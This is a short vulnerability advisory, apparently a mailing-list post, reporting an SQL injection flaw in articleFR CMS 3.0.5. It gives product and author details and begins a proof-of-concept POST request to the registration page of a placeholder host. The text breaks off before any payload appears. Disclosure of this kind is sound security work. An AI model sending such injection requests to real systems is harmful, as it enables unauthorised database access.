Posted by Tien Tran Dinh on Jan 21
#Vulnerability title: SQL injection vulnerability in articleFR CMS 3.0.5
#Product: articleFR CMS
#Vendor: http://freereprintables.com
#Affected version: version 3.0.5
#Download link: https://github.com/articlefr/articleFR
#Fixed version: N/A
#Google dork: N/A
#Author: Tran Dinh Tien (tien.d.tran () itas vn) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
+ REQUEST:
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent:…